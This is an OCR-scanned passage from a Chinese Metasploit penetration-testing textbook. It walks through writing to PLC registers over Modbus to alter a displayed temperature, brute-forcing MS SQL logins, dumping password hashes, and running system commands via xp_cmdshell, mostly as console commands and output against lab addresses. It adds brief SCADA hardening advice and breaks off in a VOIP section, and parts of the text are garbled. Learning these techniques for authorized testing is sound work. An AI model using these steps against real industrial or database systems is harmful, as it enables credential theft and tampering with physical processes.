[*] Nmap: PORT STATE SERVICE 

[*] Nmap: 135/tcp open msrpc 

[*] Nmap: 139/tcp open netbios-ssn 

[*] Nmap: 445/tcp open microsoft-ds 

[*] Nmap: 502/tcp open mbap 








502 端口 是 一 个 标准 的 Modbus/TCP 服务 器 端口 ， 用 来 实现 SCADA 软件 与 PLC 的 通信 。 有 趣 的 
是 ，Metasploit 中 提供 了 一 个 modbusclient 模块 ， 它 可 以 用 来 与 Modbus 端口 通信 ， 并 且 可 以 实现 
对 PLC 中 寄存 器 的 内 容 进行 修改 。 下 面 给 出 了 一 个 例子 。 


Imsf > use auxiliary/scanner/scada/modbusclient 

Imsf auxiliary(modbusclient) > set RHOST 192.168.116.131 
RHOST => 192.168.116.131 

Imsf auxiliary(modbusclient) > show options 















































Module options (auxiliary/scanner/scada/modbusclient): 


Name Current Setting Required Description 

DATA no Data to write (WRITE COIL and WRITE REGISTER modes only) 

DATA ADDRESS 3 yes Modbus data address 

DATA COILS no Data in binary to write (WRITE COILS mode only) e.g. 0110 

DATA REGISTERS no Words to write to each register separated with a comma (WRITE REGISTERS mode only) e.g. 1,2,3,4 
NUMBER 1 no Number of coils/registers to read (READ COILS ans READ REGISTERS modes only) 

RHOST 192.168.116.131 yes The target address 

RPORT 502 yes The target port (TCP) 

UNIT NUMBER 1 no Modbus unit number 


Auxiliary action: 


Name Description 


READ REGISTERS Read words from several registers 


Insf auxiliary(modbusclient) > set DATA ADDRESS 4 
IDATA ADDRESS => 4 
Imsf auxiliary(modbusclient) > run 


[*] 192.168.116.131:502 - Sending READ REGISTERS... 
192.168.116.131:502 - 1 register values from address 4 : 


192.168.116.131:502 - [0] 
[*] Auxiliary module execution completed 


可 以 看 到 , 这 个 辅助 模块 的 默认 功能 是 读 取 寄存 器 。 这 里 我 们 将 "DaATA_ADDRESS "的 值 设置 为 4， 
模块 执行 之 后 就 会 输出 第 4 个 寄存 器 的 值 。 可 以 看 到 这 个 值 为 0。 我 们 换 一 个 寄存 器 DATA_ADDRESS 3 
再 试 一 次 。 





















































msf auxiliary(modbusclient) > run 


[*] 192.168.116.131:502 - Sending READ REGISTERS... 
192.168.116.131:502 - 1 register values from address 3 : 
192.168.116.131:502 - [56] 

[*] Auxiliary module execution completed 

msf auxiliary(modbusclient) > |j 


好 了 ,将 值 设置 为 3, 得 到 的 输出 为 56, 这 表示 当前 第 3 个 数据 寄存 器 中 的 值 为 56。 我 们 可 以 将 
这 个 值 视 为 温度 ， 如 下 图 所 示 。 
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一 个 攻击 者 可 以 通过 在 辅助 模块 中 将 ACTION 的 值 设 置 为 WRITE_REGITSTERS 来 修 


下 图 所 示 。 

















改 这 些 值 ， 如 





msf auxiliary(modbusclient) > set ACTION 

set ACTION READ COILS set ACTION WRITE COIL set ACTION WRITE REGISTER 
set ACTION READ REGISTERS set ACTION WRITE COILS set ACTION WRITE REGISTERS 
msf auxiliary(modbusclient) » set ACTION WRITE REGISTER 

ACTION => WRITE REGISTER 














3s — FRIES METE P BUS 





msf auxiliary(modbusclient) » set DATA 89 
DATA => 89 
msf auxiliary(modbusclient) > run 


[*] 192.168.116.131:502 - Sending WRITE REGISTER... 
192.168.116.131:502 - Value 89 successfully written at registry address 3 
[*] Auxiliary module execution completed 
msf auxiliary(modbusclient) » set ACTION READ REGISTERS 
ACTION => READ REGISTERS 
msf auxiliary(modbusclient) > run 


[*] 192.168.116.131:502 - Sending READ REGISTERS... 
192.168.116.131:502 - 1 register values from address 3 : 
192.168.116.131:502 - [89] 

[*] Auxiliary module execution completed 

msf auxiliary(modbusclient) > Į 











可 以 看 到 ， 我 们 已 经 成 功 地 修改 了 这 个 值 ， 这 意味 着 HMI 上 的 温度 值 也 将 不 可 避免 地 上 升 ， 如 


下 图 所 示 。 
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上 面 的 示例 接口 仅 用 作 说 明 目 的 ， 并 演示 SCADA 和 ICS 系统 的 重要 性 。 我 们 还 可 以 通过 将 
ACTION 设置 为 READ_COILS 来 处 理 线圈 中 的 值 。 此 外 ， 我 们 可 以 按照 如 下 所 示 设 置 NUMBER 选项 来 
读 取 / 写 和 多 个 寄存 器 和 线圈 中 的 数据 。 


msf auxiliary(modbusclient) > set ACTION READ COILS 
ACTION => READ COILS 
Imsf auxiliary(modbusclient) > show options 


























Module options (auxiliary/scanner/scada/modbusclient): 


Name Current Setting Required Description 

DATA 89 no Data to write (WRITE COIL and WRITE REGISTER modes only) 

DATA ADDRESS 1 yes Modbus data address 

DATA COILS no Data in binary to write (WRITE COILS mode only) e.g. 0110 

DATA REGISTERS no Words to write to each register separated with a comma (WRITE REGISTERS mode only) 
NUMBER 4 no Number of coils/registers to read (READ COILS ans READ REGISTERS modes only) 
RHOST 192.168.116.131 yes The target address 

RPORT 502 yes The target port (TCP) 

UNIT NUMBER 1 no Modbus unit number 


Auxiliary action: 


Name Description 


READ COILS Read bits from several coils 


sf auxiliary(modbusclient) » run 


[*] 192.168.116.131:502 - Sending READ COILS... 
192.168.116.131:502 - 4 coil values from address 1 : 
192.168.116.131:502 - [1, 1, 1, 0] 

[*] Auxiliary module execution completed 

msf auxiliary(modbusclient) > 目 
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在 Metasploit 中 有 大 量 以 SCADA 系统 漏洞 为 目标 的 渗透 模块 。 如 果 想 获取 有 关 这 些 漏洞 的 详细 
信息 ， 可 以 访问 互联 网 上 最 大 的 SCADA 黑客 和 安全 技术 网 站 http:/www.scadahackercom 。 在 
http://scadahacker.com/resources/msf-scada.html 页 面 上 的 msf-scada 部 分 也 有 大 量 有 关 渗 透 模块 的 信息 。 




















5.1.5 使 SCADA 变 得 更 加 安全 


使 SCADA 网 络 更 安全 是 每 一 个 从 事 安 全 防护 工作 的 渗透 测试 工程 师 的 首要 目标 。 仔 细 阅 读 下 面 
的 内 容 来 学 习 如 何 才能 实现 SCADA 服务 的 安全 并 对 网 络 进 行 约束 。 


1. 实现 SCADA 的 安全 

在 实践 中 实现 SCADA 的 安全 是 一 个 很 困难 的 任务 。 不 过 ， 我 们 在 实现 SCADA 系统 的 安全 时 可 
以 遵循 以 下 这 些 关 键 点 。 

O 要 关注 任何 与 SCADA 网 络 建立 的 连接 ， 并 辨别 出 这 个 访问 是 否 经 过 授权 。 

O 在 无 须 网 络 连接 时 ， 要 确保 所 有 的 网 络 连接 都 断 开 。 

口 按照 SCADA 制造 商 的 要 求 完 成 所 有 安全 措施 。 

口 对 内 网 和 外 网 的 系统 都 实现 人 侵 防 御 检 测 (IDPS ) 技术 ， 并 提供 24 小 时 不 间断 的 事件 监听 。 
口 对 所 有 网 络 基础 设施 进行 记录 ， 为 管理 员 和 其 他 用 户 分 配 不 同 的 用 户 角色 。 

口 建立 IRT 队伍 或 者 蓝 队 来 定期 对 系统 进行 维护 测试 。 


2. 对 网 络 进行 约束 


网 络 发 生 的 攻击 事件 通常 与 未 经 授权 的 访问 或 者 多 余 的 开放 服务 等 有 关 。 抵 御 各 种 SCADA 攻击 
的 最 好 办 法 就 是 移 除 或 者 印 载 不 需要 的 服务 。 











































































































SCADA 系统 通常 是 基于 Windows XP 实现 的 ， 这 加 大 了 系统 遭受 攻击 的 可 能 性 。 如 
&5 果 你 正在 设计 实现 一 个 SCADA 系统 , 一定 要 不 断 地 为 你 的 Windows 系统 安装 补丁 ， 
这 样 才 能 免 遭 常见 攻击 的 破坏 。 


5.2 ”数据 库 渗透 


学 习 了 对 SCADA 网 络 进行 渗透 的 基础 知识 之 后 ， 接 下 来 开始 测试 数据 库 服 务 。 在 这 一 节 中 , 我 
们 的 主要 目标 是 测试 数据 库 以 及 测试 各 种 漏洞 。 数 据 库 中 包含 了 关键 业务 数据 。 因 此 如 果 数 据 库 管 理 
系统 存在 漏洞 ， 就 可 能 引起 远程 代码 执行 或 者 整个 网 络 被 渗透 ， 从 而 导致 公司 的 机 密 数据 泄露 。 与 金 
融 交 易 、 医 疗 记录 、 犯 罪 记录 、 产 品 、 销 售 、 市 场 营 销 等 相关 的 数据 可 能 被 出 售 给 一 些 别 有 用 心 的 人 ， 
这 些 数 据 库 对 于 他 们 来 说 是 相当 有 用 的 。 

为 了 确保 数据 库 是 完全 安全 的 ,我 们 需要 制定 相关 策略 ,采用 各 种 类 型 的 攻击 方式 对 这 些 服 务 进 
行 测试 。 现 在 ， 我 们 开始 测试 数据 库 ， 看 看 对 数据 库 进行 渗透 测试 的 各 个 阶段 。 
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5.2.1 SQL Server 


E 1989 年 微软 就 推出 了 它 的 数据 库 。 大 多 数 网 站 如 今 将 最 新 版 本 的 MS SQL Server 作为 它们 的 
后 台 。 不 过 , 如 果 网 站 太 大 或 者 每 天 要 处 理 太 多 的 事务 , 数据 库 就 必须 免 于 受到 任何 漏洞 和 问题 的 困扰 。 

在 本 节 对 数据 库 的 测试 中 ,我 们 将 集中 精力 以 一 种 有 效 的 方式 来 测试 数据 库 管 理 系 统 。 默 认 情 况 
下 ，MS SQL 运行 在 TCP 的 1433 端口 以 及 UDP 的 1434 端口 。 现 在 开始 测试 在 Windows 8 系统 上 运 
行 的 MS SQL Server 2008。 

















5.2.2 ”使 用 Metasploit 的 模块 进行 扫描 


现在 使 用 Metasploit 中 用 于 MS SQL 的 专门 模块 ,并 查看 通过 这 些 模块 可 以 帮助 我 们 获得 哪些 
信息 。 要 使 用 的 第 一 个 辅助 模块 是 mssql_ping， 这 个 模块 会 收集 一 些 其 他 的 服务 信息 。 


好 的 ， 现 在 载 入 这 个 模块 并 开始 这 次 扫 描 ， 如 下 图 所 示 。 















































msf > use auxiliary/scanner/mssql/mssql ping 

msf auxiliary(mssql ping) > set RHOSTS 192.168.65.1 
RHOSTS => 192.168.65.1 

msf auxiliary(mssql ping) > run 





[*] SQL Server information for 192.168.65.1: 


ServerName = WINS 
InstanceName = Ee 
IsClustered 

Version = Z 10. 时 1600.22 
veg = 143 


= qo d 
[*1 canned l of 1 hosts (1005 complete) 
[*] Auxiliary module execution completed 
msf auxiliary(mssql ping) > | | 


正如 上 图 所 示 ， 我 们 通过 扫描 获得 了 大 量 的 信息 。Nmap 提供 了 一 个 类 似 的 模块 来 扫描 MS SQL 
数据 库 。 但 是 与 Nmap 相 比 ，Metasploit 辅助 模块 返回 的 结果 显然 可 读 性 更 强 。 下 面 看 看 还 有 哪些 模 
块 可 用 来 测试 MS SQL Server; 







































































5.2.3 ”暴力 破解 密码 


渗透 测试 数据 库 的 下 一 步 是 对 身份 验证 模式 进行 精确 的 检测 。Metasploit 中 含有 一 个 名 为 
mssql login 的 内 置 模块 。 我 们 作为 身份 验证 的 测试 者 ， 可 以 使 用 这 个 模块 来 对 MS SQL 数据 库 
的 用 户 名 和 密码 进行 暴力 破解 。 


现在 载 人 这 个 模块 并 分 析 这 个 结果 。 


msf > use auxiliary/scanner/mssql/mssql login 

msf  auxiliary(mssql login) > set RHOSTS 192.168.65.1 
RHOSTS -» 192.168.65.1 

msf  auxiliary(mssql login) > run 









































[*] 192.168.65.1:1433 - MSSQL - Starting authentication scanner. 

[*] 192.168.65.1:1433 MSSQL - [1/2] - Trying username: 'sa' with password: ' 
192.168.65.1:1433 - MSSQL - successful login 'sa' : 

[*] Scanned 1 of 1 hosts (100% complete) 

[*] Auxiliary module execution completed 

msf auxiliary(mssql login) > J 
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运行 了 这 个 模块 之 后 , 它 会 首先 使 用 系统 的 默认 用 户 名 和 密码 进行 测试 ,这 个 默认 用 户 名 就 是 sa, 
而 默认 的 密码 则 是 空 。 如 果 使 用 这 个 组 合成 功 登录 ,我 们 就 可 以 知道 默认 的 用 户 名 和 密码 还 在 使 用 之 
中 。 此 外 ， 如 果 使 用 sa 账户 并 不 能 成 功 登录 ， 那 么 就 需要 使 用 更 多 的 登录 凭证 去 进行 测试 。 为 了 完 
成 这 项 任务 ,我 们 将 参数 USER_FILE 和 PASS_FILE 的 值 分 别 设置 为 进行 破解 所 要 使 用 的 用 户 名 和 密 
双 字 典 文件 的 名 字 ， 然 后 对 DBMS 的 用 户 名 和 密码 进行 暴力 破解 。 



































msf > use auxiliary/scanner/mssql/mssql login 
msf auxiliary(mssql login) > show options 
Module options (auxiliary/scanner/mssql/mssql login): 
Name Current Setting Required Description 
BLANK PASSWORDS true no Try blank passwords for all users 
BRUTEFORCE SPEED 5 yes How fast to bruteforce, from 0 to 5 
PASSWORD no A specific password to authenticate with 
PASS FILE no File containing passwords, one per line 
RHOSTS yes The target address range or CIDR identifier 
RPORT 1433 yes The target port 
STOP ON SUCCESS false yes Stop guessing when a credential works for a host 
THREADS 1 yes The number of concurrent threads 
USERNAME sa no A specific username to authenticate as 
USERPASS FILE no File containing users and passwords separated by space, one pair per ll 
ne 
USER AS PASS true no Try the username as the password for all users 
USER FILE no File containing usernames, one per line 
USE WINDOWS AUTHENT false yes Use windows authentification 
VERBOSE true yes Whether to print output for all attempts 











E 











来 设 定 渗透 需要 的 几 个 参数 : USER FILE. PASS FILE 以 及 RHOSTS。 只 有 设 定 了 这 些 参 数 ， 模 
块 才能 正常 运行 。 我 们 对 这 几 个 参数 进行 如 下 设置 。 











msf auxiliary(mssql login) > set USER FILE user.txt 
USER FILE -» user.txt 

msf auxiliary(mssql login) > set PASS FILE pass.txt 
PASS FILE -» pass.txt 

msf auxiliary(mssql login) > set RHOSTS 192.168.65.1 
RHOSTS -» 192.168.65.1 

msf auxiliary(mssql login) > 




















现 使 用 这 个 模块 来 对 目标 数据 库 服务 器 进行 攻击 ， 输 出 如 下 图 所 示 。 

















*] 192.168.65.1:1433 MSSQL - [02/36] - Trying username:'sa ' with password:'' 
192.168.65.1:1433 - MSSQL - successful login 'sa ' : '' 

*] 192.168.65.1:1433 MSSQL - [03/36] - Trying username:'nipun' with password:'' 

[-] 192.168.65.1:1433 MSSQL - [03/36] - failed to login as 'nipun' 

*] 192.168.65.1:1433 MSSQL - [04/36] - Trying username:'apex' with password:'' 

[-] 192.168.65.1:1433 MSSQL - [04/36] - failed to login as 'apex' 

*] 192.168.65.1:1433 MSSQL - [05/36] - Trying username:'nipun' with password: 'nipun' 

[-] 192.168.65.1:1433 MSSQL - [05/36] - failed to login as 'nipun' 

*] 192.168.65.1:1433 MSSQL - [06/36] - Trying username:'apex' with password: 'apex' 

[-] 192.168.65.1:1433 MSSQL - [06/36] - failed to login as 'apex' 

*] 192.168.65.1:1433 MSSQL - [07/36] - Trying username:'nipun' with password:'12345' 
192.168.65.1:1433 - MSSQL - successful login 'nipun' : '12345' 

*] 192.168.65.1:1433 MSSQL - [08/36] - Trying username:'apex' with password: '12345' 

[-] 192.168.65.1:1433 MSSQL - [08/36] - failed to login as 'apex' 

*] 192.168.65.1:1433 MSSQL - [09/36] - Trying username:'apex' with password: '123456' 

[-] 192.168.65.1:1433 MSSQL - [09/36] - failed to login as 'apex' 

*] 192.168.65.1:1433 MSSQL - [10/36] - Trying username:'apex' with password: '18101988' 

[-] 192.168.65.1:1433 MSSQL - [10/36] - failed to login as 'apex' 

*] 192.168.65.1:1433 MSSQL - [11/36] - Trying username:'apex' with password:'12121212' 

[-1 192.168.65.1:1433 MSSQL - [09/36] - failed to login as 'apex' 
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正如 上 面 的 结果 展示 的 ， 我 们 看 到 了 两 条 与 数据 库 相 匹配 的 用 户 名 和 密码 信息 ， 还 找到 了 默认 
用 户 名 sa， 它 的 密码 为 空 。 另 外 ， 还 发 现 了 另 一 个 用 户 名 为 nipun、 密 码 为 12345 的 登录 凭证 。 


5.2.4 ”查找 /捕获 服务 器 的 密码 


现在 我 们 已 经 取得 了 sa M nipun 两 个 数据 库 用 户 的 登录 凭证 。 接 下 来 通过 使 用 其 中 一 个 来 获取 
其 他 用 户 的 登录 赁 证。 可 以 使 用 mssal hashdump 模块 来 完成 这 个 任务 。 让 我 们 查看 这 个 模块 的 工 
作 过 程 ， 并 从 这 个 模块 成 功 完成 后 提供 的 所 有 信息 中 进行 调查 。 


msf > use auxiliary/scanner/mssql/mssql hashdump 

msf auxiliary(mssql hashdump) > set RHOSTS 192.168.65.1 
RHOSTS => 192.168.65.1 

msf  auxiliary(mssql hashdump) > show options 








T 





















































Module options (auxiliary/scanner/mssql/mssql hashdump): 


Name Current Setting Required Description 

PASSWORD no The password for the specified username 

RHOSTS 192.168.65.1 yes The target address range or CIDR identifier 
RPORT 1433 yes The target port 

THREADS 1 yes The number of concurrent threads 

USERNAME sa no The username to authenticate as 

USE WINDOWS AUTHENT false yes Use windows authentification (requires DOMAIN o 


ption set) 
msf auxiliary(mssql hashdump) > run 


[*] Instance Name: nil 

192.168.65.1:1433 - Saving mssql05.hashes = sa:01009371739643eebf33bc464cc6ac8d2fda70f31c6d5c8 
ee270 

192.168.65.1:1433 - Saving mssqlO5.hashes = ##MS PolicyEventProcessingLogin£z:01003869d680adf6 
3db291c6737f1efb8e4a481b02284215913f 

192.168.65.1:1433 - Saving mssqlO5.hashes = ##MS PolicyTsqlExecutionLoginz:01008d22a249df5ef3 
b79ed321563aldccdc9cfc5ffo54dd2dof 

192.168.65.1:1433 - Saving mssqlO05.hashes = nipun:01004bd5331c2366db85cb0de6eaf12ac1c91755b116 
60358067 
[*] Scanned 1 of 1 hosts (100* complete) 
[*] Auxiliary module execution completed 
msf auxiliary(mssql hashdump) > B 


SpA DOGS PE CAS d FCRC P R TROP EE, Ute RT EARTH SS ZA T-HORON DOR TROP RI 
进行 破解 ， 这 样 就 可 以 提升 权限 或 者 获得 其 他 数据 库 和 表 的 权限 。 

















5.2.5 浏览 SQL Server 





我 们 在 上 一 节 中 取得 了 目标 数据 库 的 用 户 名 和 和 密码。 现在 可 以 登录 到 这 个 服务 右上 ， 从 该 数据 库 
收集 重要 的 信息 ， 比 如 存储 过 程 、 数 据 库 的 数量 和 名 称 、 可 登录 到 数据 库 的 Windows 组 、 数 据 库 中 的 
文件 以 及 一 些 参 数 。 


为 了 实现 这 个 日 的 ， 可 以 使 用 mssql_enum。 接 下 来 看 看 如 何在 日 标 数 据 库 上 运行 这 个 模块 。 
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当 mssql enum 运行 起 来 之 后 , 就 可 以 收集 到 该 数据 库 的 大 量 信息 。 来 看 看 它 都 为 我 们 提供 了 什 








msf > use auxiliary/admin/mssql/mssql enum 
msf  auxiliary(mssql enum) » show options 


Module options (auxiliary/admin/mssql/mssql enum): 


Name Current Setting Required Description 

PASSWORD no The password for the specif 
ied username 

Proxies no Use a proxy chain 

RHOST yes The target address 

RPORT 1433 yes The target port 

USERNAME sa no The username to authenticat 
e as 

USE WINDOWS AUTHENT false yes Use windows authentificatio 


n (requires DOMAIN option set) 


msf  auxiliary(mssql enum) » set USERNAME nipun 
USERNAME => nipun 

msf  auxiliary(mssql enum) > set password 123456 
password -» 123456 

msf auxiliary(mssql enum) > runi 


























么 信息 。 








msf  auxiliary(mssql enum) > set RHOST 192.168.65.1 

RHOST => 192.168.65.1 

msf  auxiliary(mssql enum) > run 

[*] Running MS SQL Server Enumeration... 

[*] Version: 

[*] Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) 
[*1 Jul 9 2008 14:43:34 

[*] Copyright (c) 1988-2008 Microsoft Corporation 

[*] Developer Edition on Windows NT 6.2 «X86» (Build 9200: ) 
[*] Configuration Parameters: 

[*] C2 Audit Mode is Not Enabled 

[*] xp_cmdshell is Enabled 

[*] remote access is Enabled 

[*] allow updates is Not Enabled 

[*] Database Mail XPs is Not Enabled 

[*] Ole Automation Procedures are Enabled 

[*] Databases on the server: 

[*1 Database name:master 

[*1 Database Files for master: 

[*1 C:\Program Files\Microsoft SQL ServerMMSSQL10.MSSQLSERVERMMSSQ 
LNDATAXmaster.mdf 











正如 我 们 看 到 的 那样 ， 这 个 模块 几乎 展示 了 数据 库 的 所 有 信息 ， 例 如 存储 过 程 、 数 据 库 的 名 称 和 








数量 、 被 禁用 的 账户 ， 等 等 





我 们 将 会 











在 5.2.6 节 中 看 到 如 何 绕 过 一 些 禁用 的 存储 过 程 。 另 外 , 如 xp cmdshell 之 类 的 过 程 可 


能 会 导致 整个 数据 库 被 渗透 。 可 以 从 上 图 中 看 到 该 服务 器 中 xpo cmdshelii 是 可 用 的 。 接 着 查看 


























mssql_enum 模块 还 提供 了 哪些 信息 。 
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- 
[*] System Admin Logins on this Server: 

[*] sa 

[*] NT AUTHORITY\SYSTEM 

[*] NT SERVICE\MSSQLSERVER 

[*] win8\Nipun 

[*] NT SERVICE\SQLSERVERAGENT 

[*] nipun 

[*] Windows Logins on this Server: 

[*] NT AUTHORITY\SYSTEM 

[*] win8\Nipun 

[*] Windows Groups that can logins on this Server: 

[*] NT SERVICE\MSSQLSERVER 

[*] NT SERVICE\SQLSERVERAGENT 

[*] Accounts with Username and Password being the same: 

[*] No Account with its password being the same as its username was found. 
[*] Accounts with empty password: 

[*] sa 


[*] Stored Procedures with Public Execute Permission found: 
[*] sp_replsetsyncstatus 

[*] sp_replcounters 

[*] sp_replsendtoqueue 

[*] sp_resyncexecutesql 

[*] sp_prepexecrpc 

[*] sp_repltrans 








[*] sp_xml_preparedocument 
[*] xp qv 

[*] xp getnetname 

[*] sp releaseschemalock 
[*] sp refreshview 

[*] sp_replcmds 

[*] sp_unprepare 

[*] sp_resyncprepare 











运行 这 个 模块 之 后 ， 可 以 从 上 面 的 屏幕 截图 中 看 到 大 量 的 信息 。 这 里 面包 括 了 一 个 存储 过 程 的 列 
一 些 密码 为 空 的 账户 、 数 据 库 的 Windows 登录 名 以 及 管理 员 登 录 名 。 


3 





5.2.6 后 渗透 /执行 系统 命令 


在 收集 够 了 关于 目标 的 信息 以 后 ,让 我 们 在 目标 数据 库 上 完成 一 些 后 渗透 攻击 。 为 了 完成 后 渗透 
攻击 ， 可 以 使 用 两 个 不 同 但 都 十 分 方便 的 模块 。 第 一 个 要 使 用 的 模块 是 mssql_sql， 凭 借 它 将 可 以 
在 数据 库 上 运行 SQL 查询 。 第 二 个 要 使 用 的 模块 是 mssql_exec， 它 可 以 启用 已 经 被 禁用 的 
xp_cmdqshel1， 从 而 允许 执行 系统 级 的 命令 。 


1. 重新 载 入 xp_cmdshe11 功能 


模块 mssql exec 将 会 通过 重新 载 人 禁用 的 xp_cmdshell 功能 来 运行 系统 级 的 命令 。 这 个 模块 
需要 设置 要 执行 的 系统 命令 的 cMD 选项 。 让 我 们 查看 一 下 这 个 过 程 。 





















































msf > use auxiliary/admin/mssql/mssql exec 

msf  auxiliary(mssql exec) > set CMD 'ipconfig' 
CMD => ipconfig 

msf  auxiliary(mssql exec) > run 








[*] SQL Query: EXEC master..xp cmdshell 'ipconfig' 























完成 了 mssql exec 模块 的 运行 之 后 ， 屏 幕 上 将 会 显示 出 如 下 图 所 示 的 结果 。 
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Connection-specific DNS Suffix 

Connection-specific DNS Suffix 

Default Gateway . 

Default Gateway . 

Default Gateway . ER D ETE 

Default Gateway . . . . . . . . . : 192.168.43.1 

IPv4 Address. . . . . . . . . . . : 192.168.19.1 

IPv4 Address. . . . . . . . . . . : 192.168.43.240 

IPv4 Address. . . . . . . . . . . : 192.168.56.1 

IPv4 Address. . . . sx xe x a f 282.108B.BB.1 

Link-local IPv6 Address 5.5.5 1 fe80::59c2:8146:3f3d:6634526 
Link-local IPv6 Address . . . . . : fe80::9ab:3741:e9f0:b74d*:12 
Link-local IPv6 Address . . . . . : fe80::9dec:d1ae:5234:bd41*524 
Link-local IPv6 Address . . . . . : fe80::c83f:ef41:214b:bc3e*:21 
Media State 55. s. 1 Media disconnected 

Media State. . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State. . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State. . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Subnet Mask . . . . . . . . . . . : 255.255.255.0 

Subnet Mask . . . . . . . . . a . : 255.255.255.0 

Subnet Mask . . . . . . . . . . . : 255.255.255.0 

Subnet Mask . . . . . . . . . . . : 255.255.255.0 


























结果 窗口 中 清楚 地 显示 了 对 目标 数据 库 服 务 器 成 功 执行 的 系统 命令 。 


运行 SQL 查询 命令 
可 以 使 用 mssql_sal RRN 目标 数据 库 服务 器 执行 SQL 查询 命令 ,你 只 需 将 SQL 参数 的 值 设 定 
为 一 条 有 效 的 数据 库 查 询 命令 ， 这 条 命令 就 会 被 执行 ， 如 下 图 所 示 。 

















msf > use auxiliary/admin/mssql/mssql sql 
msf  auxiliary(mssql sql) > run 


[*] SQL Query: select @@version 
[*1 Row Count: 1 (Status: 16 Command: 193) 


NULL 


Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) 
Jul 9 2008 14:43:34 
Copyright (c) 1988-2008 Microsoft Corporation 
Developer Edition on Windows NT 6.2 «X86» (Build 9200: ) 


[*] Auxiliary module execution completed 
msf  auxiliary(mssql sql) > f 


将 SOL 参数 的 值 设置 为 select eeversion。 数 据 库 成 功 执行 这 令 之 后 ， 我 们 就 可 以 
获悉 这 个 数据 库 的 版 本 了 。 


按照 之 前 的 步骤， 可 以 使 用 Metasploit 来 测试 出 各 种 数据 库 的 漏洞 。 
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我 的 另 一 本 著作 中 介绍 了 对 MySQL 数据 库 的 测试 : https:/www.packtpub.com/networking- 
and-servers/metasploit-bootcamp。 

下 面 提供 了 一 些 用 于 保护 MS SQL 数据 库 的 资源 : https://www.mssqltips.com/sql- 
server-tip-category/19/security/。 

关于 MySQL 的 一 些 参考 资料 : http://www.hexatier.com/mysql-database-security-best- 


practices-2/。 
5.3 VOIP 渗透 测试 
现在 的 重点 是 测试 支持 VOIP 的 服务 ， 并 学 习 如 何 找到 可 能 影响 VOIP 服务 的 各 种 漏洞 。 


5.3.1 VOIP 的 基本 原理 


相 比 传统 的 电话 服务 ，VOIP 的 价格 要 低廉 很 多 。 相 比 传统 的 电信 业务 ，VOIP 更 加 灵活 ， 也 提供 
了 各 种 特性 ， 例 如 多 样 的 扩展 性 、 来 电 显示 服务 、 日 志 服 务 、 每 次 通话 的 录音 ， 等 等 。 最 近 许多 公司 
都 推出 了 用 于 IP 电话 服务 的 专用 交换 机 (private branch exchange, PBX )。 


无 论 是 传统 的 还 是 现代 的 电话 系统 在 面 对 物 理 线路 的 攻击 时 都 还 显得 十 分 脆弱 。 例 如 ， 一 个 攻击 
者 改变 了 电话 线路 的 连接 情况 ,将 受害 者 的 电话 线路 连接 到 了 自己 这 里 。 他 将 可 以 使 用 自己 的 设备 接 
听 本 来 是 打 给 受害 者 的 电话 ， 也 能 够 以 受害 者 的 号 码 拨打 外 部 的 电话 ， 同 样 可 以 使 用 这 个 线路 来 上 网 
或 者 发 送 、 接 收 传真 。 

在 对 VOIP 进行 渗透 的 时 候 , 可 以 不 用 改变 受害 者 的 电话 线路 。 不 过 , 如果 你 并 不 了 解 关 于 VOIP 
的 基础 知识 以 及 工作 原理 ,那么 这 次 渗透 将 会 是 十 分 困难 的 工作 。 这 部 分 内 容 将 会 向 我 们 指明 如 何在 
不 挟持 电话 线路 的 情况 下 成 功 渗透 一 个 VOP 网 络 。 

1. PBX 简介 


在 中 小 型 企业 中 ,PBX 是 一 个 性 价 比 很 高 的 电话 通信 和 解决 方案 。 因 为 它 非常 灵活 ,实现 了 各 房间 
和 各 楼 层 之 间 的 通信 。 大 型 公司 也 可 能 会 选择 PBX, 主要 因为 要 将 每 一 条 电话 线路 单独 与 外 界 联通 是 
一 项 很 麻烦 的 工作 。 一 个 PBX 包括 以 下 几 个 部 分 。 
O 连接 到 PBX 上 的 电话 中 继 线 。 
口 一 台 用 来 管理 所 有 通过 PBX 打 进 或 打出 的 电话 的 计算 机 。 
口 PBX 通信 线路 网 络 。 
口 一 个 手动 操作 的 控制 台 或 者 总 机 。 


2. VOIP 服务 的 类 型 
可 以 将 VOIP 技术 分 成 三 种 不 同 的 类 型 ， 下 面 来 看 看 它们 都 是 什么 。 
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3. 自 托管 网 络 


在 这 种 类 型 的 网 络 中 ，PBX 通常 被 安装 在 客户 端的 页 面 本 身 ， 与 Internet 服务 提供 商 (Internet 
service provider, ISP ) 建立 远程 连接 。 这 种 类 型 的 网 络 连接 通常 通过 大 量 的 虚拟 局 域 网 向 PBX 设备 发 
送 VOIP 数据 流量 ， 这 些 流量 会 被 转发 给 公用 电话 交换 网 (public switched telephone network, PSTN ) 
fil ISP 以 进行 线路 交换 和 建立 互联 网 连接 。 下 图 给 出 了 一 个 图 形 化 的 例子 。 


— 9 
il ERA 




































































4. 托管 服务 


在 托管 服务 类 型 的 VOIP 技术 中 ， 客 户 端 都 不 存在 PBX。 但 是 ， 所 有 设备 都 是 在 客户 端 通过 互联 
网 连接 到 服务 提供 商 的 PBX， 也 就 是 使 用 IP/VPN 技术 通过 会 话 初 始 协 议 ( session initiation protocol , 
SIP ) 线路 连接 的 。 


证 我 们 在 下 图 的 帮助 下 看 看 这 项 技术 是 如 何 实现 的 。 
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5. SIP 服务 提供 商 


互联 网 上 有 很 多 的 SIP 服务 提供 商 ， 他 们 提供 了 可 以 直接 使 用 的 VOIP 服务 。 此 外 ， 可 以 使 用 任 
何 客户 端 去 接 和 人 VOIP 服务 ， 例 如 Xlite， 如 下 图 所 示 。 



































5.3.2 对 VOIP 服务 踩点 


可 以 使 用 Metasploit 内 置 的 SIP 扫描 模块 工具 来 对 网 络 中 的 VOP 设备 进行 踩点 。 这 里 有 一 个 极 
为 著名 的 SIP 端点 扫描 程序 (SIP endpoint scanner ) 就 内 置 在 Metasploit 中 ， 可 以 通过 让 这 个 扫描 器 发 
出 各 种 SIP 服务 的 options 请 求 来 查找 网 络 上 启用 了 SIP 服务 的 设备 。 

继续 使 用 /auxiliary/scanner/sip 下 的 options 辅助 模块 对 VOIP 进行 扫描 , 并 对 扫描 的 结 
